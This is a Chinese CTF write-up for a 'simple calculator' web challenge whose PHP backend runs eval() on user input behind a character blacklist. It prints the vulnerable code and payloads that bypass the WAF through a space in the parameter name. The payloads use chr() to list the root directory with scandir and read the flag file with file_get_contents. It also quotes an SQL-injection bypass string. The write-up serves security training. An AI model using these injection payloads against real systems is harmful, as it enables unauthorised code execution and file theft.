打开环境
右键查看源码
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>简单的计算器</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="./libs/bootstrap.min.css">
<script src="./libs/jquery-3.3.1.min.js"></script>
<script src="./libs/bootstrap.min.js"></script>
</head>
<body>
<div class="container text-center" style="margin-top:30px;">
<h2>表达式</h2>
<form id="calc">
<div class="form-group">
<input type="text" class="form-control" id="content" placeholder="输入计算式" data-com.agilebits.onepassword.user-edited="yes">
</div>
<div id="result"><div class="alert alert-success">
</div></div>
<button type="submit" class="btn btn-primary">计算</button>
</form>
</div>
<!--I've set up WAF to ensure security.-->
<script>
$('#calc').submit(function(){
$.ajax({
url:"calc.php?num="+encodeURIComponent($("#content").val()),
type:'GET',
success:function(data){
$("#result").html(`<div class="alert alert-success">
<strong>答案:</strong>${data}
</div>`);
},
error:function(){
alert("这啥?算不来!");
}
})
return false;
})
</script>
</body></html>
发现了url:"calc.php?num="+encodeURIComponent($("#content").val())
这样一段话
encodeURIComponent:
encodeURIComponent() 函数可把字符串作为 URI 组件进行编码。 该方法不会对 ASCII
字母和数字进行编码,也不会对这些 ASCII 标点符号进行编码: - _ . ! ~ * ’ ( ) 。 其他字符(比如 :;/?:
@&=+$,# 这些用于分隔 URI
组件的标点符号),都是由一个或多个十六进制的转义序列替换的。encodeURIComponent(uri) uri:必需。一个字符串,含有
URI 组件或其他要编码的文本。
$("#content").val() :
获取id为content的HTML标签元素的值,是JQuery,
$("#content")相当于document.getElementById(“content”);
$("#content").val()相当于 document.getElementById(“content”).value;
document.getElementById(" ") 得到的是一个对象,用 alert 显示得到的是“ object
”,而不是具体的值,它有 value 和 length 等属性,加上 .value 得到的才是具体的值.
也就是calc.php?num=后面要把输入的content进行ASCII编码
那就先打开calc.php这个路径:http://node3.buuoj.cn:25804/calc.php
访问获得php代码
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>
先输入payload:http://node3.buuoj.cn:25804/calc.php?num=1
再输入payload:http://node3.buuoj.cn:25804/calc.php?num=a
被waf拦截,尝试空格绕过
如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截,那么我们就可以用以下语句绕过:
/news.php?%20news[id%00=42"+AND+1=0–
上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。
PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:
1.删除空白符
2.将某些字符转换为下划线(包括空格) payload:http://node3.buuoj.cn:25804/calc.php?%20num=a
这里介绍几个函数:
file_get_contents():file_get_contents()
把整个文件读入一个字符串中.该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。
scandir:列出指定路径中的文件和目录,scandir ( string $directory [, int $sorting_order [, resource $context ]] ) : array
返回一个 array,包含有 directory 中的文件和目录。
print_r():print_r() 函数用于打印变量,以更容易理解的形式展示。
先构造一个扫描根路径中的文件和目录的payload,因为‘/’被过滤,用chr()绕过,chr() 用一个范围在 range(256)内的(就是0~255)整数作参数,返回一个对应的字符,返回值是当前整数对应的 ASCII 字符。例如: 'print(chr(47)) 输出结果就是/'
/的ASCll码是47
payload:http://node3.buuoj.cn:25804/calc.php?%20num=print_r(scandir(chr(47)))
得到f1agg
将f1agg分别转化为ASCII码,构造payload:
http://node3.buuoj.cn:27941/calc.php?%20num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
得到flag:
看了很多wp大佬们也有用var_dump()的:
http://node3.buuoj.cn:27941/calc.php?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
不仅打印了flag,还显示是长度47的字符串
var_dump()方法是判断一个变量的类型与长度,并输出变量的数值,如果变量有值输的是变量的值并回返数据类型.此函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构
共同点:两者都可以打印数组,对象之类的复合型变量。
区别:print_r() 只能打印一些易于理解的信息,且print_r()在打印数组时,会将把数组的指针移到最后边,使用 reset() 可让指针回到开始处。
而var_dump()不但能打印复合类型的数据,还能打印资源类型的变量。且var_dump()输出的信息则比较详细,一般调试时用得多。